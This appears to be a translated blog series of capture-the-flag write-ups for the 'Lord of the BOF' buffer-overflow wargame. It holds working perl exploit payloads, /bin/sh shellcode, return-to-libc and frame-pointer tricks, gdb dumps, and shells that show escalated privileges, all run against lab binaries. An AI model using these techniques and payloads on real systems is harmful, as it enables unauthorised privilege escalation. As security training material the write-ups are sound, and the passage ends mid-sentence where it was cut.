55 posts in 'All categories'

  1. 2014.02.20 zombie_assassin -> succubus
  2. 2014.02.20 assassin -> zombie_assassin
  3. 2014.02.20 giant -> assassin
  4. 2014.02.20 bugbear -> giant
  5. 2014.02.20 darkknight -> bugbear
  6. 2014.02.20 golem -> darkknight
  7. 2014.02.20 skeleton -> golem
  8. 2014.02.20 vampire -> skeleton
  9. 2014.02.20 troll -> vampire
  10. 2014.02.20 orge -> troll
[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$ 


Posted by windowhan
Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
Xshell:\>

Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
/:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
|        The Lord of the BOF : The Fellowship of the BOF, 2010    |
|                                                                  |
|                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________--------------------------


login: assassin
Password:
Last login: Fri Sep  6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2                         
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core  fs  fs.c  zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
0xbffffc27:     0x6f682f3d     0x612f656d     0x73617373     0x2f6e6973
0xbffffc37:     0x00706d74     0x4f4d4552     0x4f484554     0x313d5453
0xbffffc47:     0x312e3239     0x322e3836     0x312e3233     0x534f4800
0xbffffc57:     0x4d414e54     0x6f6c3d45     0x686c6163     0x2e74736f
0xbffffc67:     0x61636f6c     0x6d6f646c     0x006e6961     0x5353454c
0xbffffc77:     0x4e45504f     0x752f7c3d     0x622f7273     0x6c2f6e69
0xbffffc87:     0x70737365     0x2e657069     0x25206873     0x53550073
0xbffffc97:     0x613d5245     0x73617373     0x006e6973     0x435f534c
0xbffffca7:     0x524f4c4f     0x6f6e3d53     0x3a30303d     0x303d6966
0xbffffcb7:     0x69643a30     0x3b31303d     0x6c3a3433     0x31303d6e
0xbffffcc7:     0x3a36333b     0x343d6970     0x33333b30     0x3d6f733a
0xbffffcd7:     0x333b3130     0x64623a35     0x3b30343d     0x303b3333
0xbffffce7:     0x64633a31     0x3b30343d     0x303b3333     0x726f3a31
0xbffffcf7:     0x3b31303d     0x333b3530     0x31343b37     0x3d696d3a
0xbffffd07:     0x303b3130     0x37333b35     0x3a31343b     0x303d7865
0xbffffd17:     0x32333b31     0x632e2a3a     0x303d646d     0x32333b31
0xbffffd27:     0x652e2a3a     0x303d6578     0x32333b31     0x632e2a3a
0xbffffd37:     0x303d6d6f     0x32333b31     0x622e2a3a     0x303d6d74
0xbffffd47:     0x32333b31     0x622e2a3a     0x303d7461     0x32333b31
0xbffffd57:     0x732e2a3a     0x31303d68     0x3a32333b     0x73632e2a
0xbffffd67:     0x31303d68     0x3a32333b     0x61742e2a     0x31303d72
0xbffffd77:     0x3a31333b     0x67742e2a     0x31303d7a     0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) q    
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit 
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq   
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
0xbffffc23:     0x44575000     0x6f682f3d     0x612f656d     0x73617373
0xbffffc33:     0x2f6e6973     0x00706d74     0x4f4d4552     0x4f484554
0xbffffc43:     0x313d5453     0x312e3239     0x322e3836     0x312e3233
0xbffffc53:     0x534f4800     0x4d414e54     0x6f6c3d45     0x686c6163
0xbffffc63:     0x2e74736f     0x61636f6c     0x6d6f646c     0x006e6961
0xbffffc73:     0x5353454c     0x4e45504f     0x752f7c3d     0x622f7273
0xbffffc83:     0x6c2f6e69     0x70737365     0x2e657069     0x25206873
0xbffffc93:     0x53550073     0x613d5245     0x73617373     0x006e6973
0xbffffca3:     0x435f534c     0x524f4c4f     0x6f6e3d53     0x3a30303d
0xbffffcb3:     0x303d6966     0x69643a30     0x3b31303d     0x6c3a3433
0xbffffcc3:     0x31303d6e     0x3a36333b     0x343d6970     0x33333b30
0xbffffcd3:     0x3d6f733a     0x333b3130     0x64623a35     0x3b30343d
0xbffffce3:     0x303b3333     0x64633a31     0x3b30343d     0x303b3333
0xbffffcf3:     0x726f3a31     0x3b31303d     0x333b3530     0x31343b37
0xbffffd03:     0x3d696d3a     0x303b3130     0x37333b35     0x3a31343b
0xbffffd13:     0x303d7865     0x32333b31     0x632e2a3a     0x303d646d
0xbffffd23:     0x32333b31     0x652e2a3a     0x303d6578     0x32333b31
0xbffffd33:     0x632e2a3a     0x303d6d6f     0x32333b31     0x622e2a3a
0xbffffd43:     0x303d6d74     0x32333b31     0x622e2a3a     0x303d7461
0xbffffd53:     0x32333b31     0x732e2a3a     0x31303d68     0x3a32333b
0xbffffd63:     0x73632e2a     0x31303d68     0x3a32333b     0x61742e2a
0xbffffd73:     0x31303d72     0x3a31333b     0x67742e2a     0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q  
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id   
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$



Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

I don't remember it clearly, but I think I solved this one with a RET sled...

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00:     0x69616d6f      0x4f4c006e      0x4d414e47      0x69673d45
0xbffffd10:     0x00746e61      0x4f4d4552      0x4f484554      0x313d5453
0xbffffd20:     0x312e3239      0x322e3836      0x312e3232      0x49414d00
0xbffffd30:     0x762f3d4c      0x732f7261      0x6c6f6f70      0x69616d2f
0xbffffd40:     0x69672f6c      0x00746e61      0x4d524554      0x6574783d
0xbffffd50:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd60:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd70:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd80:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd90:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffda0:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffdb0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdc0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdd0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffde0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffdf0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffe00:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe10:     0x694c3d45      0x0078756e      0x564c4853      0x00313d4c
0xbffffe20:     0x435f534c      0x524f4c4f      0x6f6e3d53      0x3a30303d
0xbffffe30:     0x303d6966      0x69643a30      0x3b31303d      0x6c3a3433
0xbffffe40:     0x31303d6e      0x3a36333b      0x343d6970      0x33333b30
0xbffffe50:     0x3d6f733a      0x333b3130      0x64623a35      0x3b30343d
0xbffffe60:     0x303b3333      0x64633a31      0x3b30343d      0x303b3333
0xbffffe70:     0x726f3a31      0x3b31303d      0x333b3530      0x31343b37
0xbffffe80:     0x3d696d3a      0x303b3130      0x37333b35      0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
0xbffffcac:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375
0xbffffcbc:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e
0xbffffccc:     0x55007325      0x4e524553      0x3d454d41      0x53494800
0xbffffcdc:     0x5a495354      0x30313d45      0x48003030      0x4e54534f
0xbffffcec:     0x3d454d41      0x61636f6c      0x736f686c      0x6f6c2e74
0xbffffcfc:     0x646c6163      0x69616d6f      0x4f4c006e      0x4d414e47
0xbffffd0c:     0x69673d45      0x00746e61      0x4f4d4552      0x4f484554
0xbffffd1c:     0x313d5453      0x312e3239      0x322e3836      0x312e3232
0xbffffd2c:     0x49414d00      0x762f3d4c      0x732f7261      0x6c6f6f70
0xbffffd3c:     0x69616d2f      0x69672f6c      0x00746e61      0x4d524554
0xbffffd4c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd5c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd6c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd7c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd8c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd9c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffdac:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdbc:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdcc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffddc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffdec:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdfc:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffe0c:     0x50595453      0x694c3d45      0x0078756e      0x564c4853
0xbffffe1c:     0x00313d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
0xbffffcb4:     0x2f7c3d4e      0x2f727375      0x2f6e6962      0x7373656c
0xbffffcc4:     0x65706970      0x2068732e      0x55007325      0x4e524553
0xbffffcd4:     0x3d454d41      0x53494800      0x5a495354      0x30313d45
0xbffffce4:     0x48003030      0x4e54534f      0x3d454d41      0x61636f6c
0xbffffcf4:     0x736f686c      0x6f6c2e74      0x646c6163      0x69616d6f
0xbffffd04:     0x4f4c006e      0x4d414e47      0x69673d45      0x00746e61
0xbffffd14:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffd24:     0x322e3836      0x312e3232      0x49414d00      0x762f3d4c
0xbffffd34:     0x732f7261      0x6c6f6f70      0x69616d2f      0x69672f6c
0xbffffd44:     0x00746e61      0x4d524554      0x6574783d      0x48006d72
0xbffffd54:     0x5454534f      0x3d455059      0x36383369      0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin  assassin.c  tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle  Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$



The problem is as follows.


[bugbear@localhost tmp]$ cat ../giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

Here only the execve function may be used.

To build the arguments for execve,

execve("string to execute", a pointer to a location holding the address of that string, NULL) is needed.

That is, something of the form execve("/bin/sh", &("/bin/sh"), 0) is required.
At first I tried putting the address of /bin/sh and a huge run of null bytes into two environment variables, R and R2, and going from there.

0xbffffdca:      "R2="
0xbffffdce:      "USER=bugbear"
0xbffffddb:      "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa:      "LANG=en_US"
0xbffffe05:      "R=u¿\017@"
0xbffffe0c:      "OSTYPE=Linux"
0xbffffe19:      "SHLVL=1"

But the addresses where the variables ended up were completely different from what I had intended.
On top of that, I tried naming the variable Z, the last letter of the alphabet, so the payload would sit right next to the null bytes,
but that was my misunderstanding.
I had assumed there would be null bytes in between, but other values were there.

0xbffffe12:      "Z=u¿\017@"
0xbffffe19:      "SHLVL=1"
0xbffffe21:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4:      "/home/bugbear/tmp/giant"
0xbffffffc:      ""

So what I decided to use instead was argv.
argv[0] also leaves residue at the very end of the stack,

like 0xbfffffe4:      "/home/bugbear/tmp/giant" above.
Deliberately rename the binary so that its file name is the address of the "/bin/sh" string, then build the arguments with a pointer to that address.

And to build execve's arguments, a null byte has to come right after it.

./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"
  



It was a basic RTL (return-to-libc) problem.

In terms of difficulty, it is even easier than the previous one, lol.

I used the system function.


The problem is as follows.


[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}


The source for finding the "/bin/sh" string is as follows:


#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
       long shell;
       shell = 0x40058ae0; // start at the address of system(); the "/bin/sh" string lies after it in libc

       // scan forward one byte at a time until all 8 bytes (including the terminating NUL) match
       while(memcmp((void *)shell,"/bin/sh",8))shell++;
       printf("\"/bin/sh\" is at 0x%x\n",shell);
       return 0;
}




[darkknight@localhost darkknight]$ ./bugbear  `perl -e 'print "\xe0\x8a\x05\x40"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
bash$ my-pass
euid = 513
new divide

Because the OS is Redhat 6.2, there is no getuid() check inside the system function, so system() could be used.




First, looking at the source,

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}



The hint above says FPO, which seems to stand for "stack Frame Pointer Operation". (So not SFPO, lol)


0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp


This is the function prologue: it saves the caller's ebp.

Right now we are inside problem_child, called from main; the saved value is there so that when the function returns, execution can get back to the previous function's base pointer.

Because problem_child returns with a manipulated sfp loaded into ebp, and main's own leave; ret then runs, the following is executed:

mov %ebp,%esp
pop %ebp

That is, esp is set to ebp, and then popping ebp loads the (manipulated) sfp into ebp while esp moves up by 4.

Therefore the address the sfp points to, plus 4, is where main's return address is taken from.

In other words, problem_child's saved ebp (the sfp, from main's point of view) + 4 becomes main's return address.

And here, because strncpy copies 41 bytes into a 40-byte buffer, exactly one byte of the sfp (its lowest byte) can be manipulated.
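To make the one-byte effect concrete, the following is an added example of mine, not code from the post: it models problem_child's frame as a plain 44-byte array, 40 bytes of buffer immediately followed by the saved ebp, using the ebp value 0xbffff9ac that the gdb session further down prints, and runs the same strncpy with n = 41 next to a correctly bounded copy. The array, the helper functions and the forty-'A' input are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post. The frame is modelled as a flat
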